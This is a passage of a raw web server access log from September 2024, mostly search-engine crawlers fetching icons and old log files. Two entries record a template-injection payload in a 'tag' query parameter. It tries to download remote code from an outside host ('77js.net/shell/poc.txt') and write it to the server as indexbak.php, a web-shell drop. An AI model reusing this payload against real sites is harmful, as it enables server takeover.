10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71" 66.249.66.38 - - [14/Sep/2024:14:37:14 +0800] "GET /icons/compressed.png HTTP/1.1" 200 1108 "-" "Googlebot-Image/1.0" 121.237.36.30 - - [14/Sep/2024:15:15:05 +0800] "GET /favicon.ico HTTP/1.1" 404 1052 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" 66.249.66.38 - - [14/Sep/2024:15:26:45 +0800] "GET /icons/box2.gif HTTP/1.1" 200 268 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:16:07:15 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 4463 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:16:14:13 +0800] "GET /logs/access_20230829.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 198.98.50.244 - - [14/Sep/2024:16:16:59 +0800] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=indexbak.php&t2=file_get_contents&t3=http://77js.net/shell/poc.txt HTTP/1.1" 200 794 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0" 198.98.50.244 - - [14/Sep/2024:16:16:59 +0800] "GET /indexbak.php HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0" 121.237.36.30 - - [14/Sep/2024:16:26:53 +0800] "GET / HTTP/1.1" 200 794 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" 66.249.66.38 - - [14/Sep/2024:16:53:06 +0800] "GET /icons/small/comp2.png HTTP/1.1" 200 215 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:17:37:14 +0800] "GET /icons/odf6ott.png HTTP/1.1" 200 1022 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:18:22:14 +0800] "GET /icons/small/uu.png HTTP/1.1" 200 166 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:19:07:14 +0800] "GET /robots.txt HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:19:07:14 +0800] "GET /icons/ball.red.png HTTP/1.1" 200 289 "-" "Googlebot-Image/1.0" 198.235.24.11 - - [14/Sep/2024:19:14:32 +0800] "GET / HTTP/1.1" 200 794 "-" "-" 220.181.108.174 - - [14/Sep/2024:20:20:56 +0800] "GET /logs/access_20231125.log HTTP/1.1" 200 220801 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 116.179.32.77 - - [14/Sep/2024:20:20:56 +0800] "GET /logs/access_20231125.log HTTP/1.1" 200 220801 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 66.249.66.38 - - [14/Sep/2024:21:19:29 +0800] "GET /icons/patch.gif HTTP/1.1" 200 251 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:22:07:14 +0800] "GET /icons/left.gif HTTP/1.1" 200 172 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:22:32:16 +0800] "GET /logs/access_20230516.log HTTP/1.1" 200 25213 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:22:32:17 +0800] "GET /logs/access_20230827.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 198.98.50.244 - - [14/Sep/2024:22:44:21 +0800] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=indexbak.php&t2=file_get_contents&t3=http://77js.net/shell/poc.txt HTTP/1.1" 200 794 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0" 66.249.66.36 - - [14/Sep/2024:23:26:16 +0800] "GET /icons/sphere1.gif HTTP/1.1" 200 285 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:23:53:46 +0800] "GET /icons/small/generic.gif HTTP/1.1" 200 116 "-" "Googlebot-Image/1.0"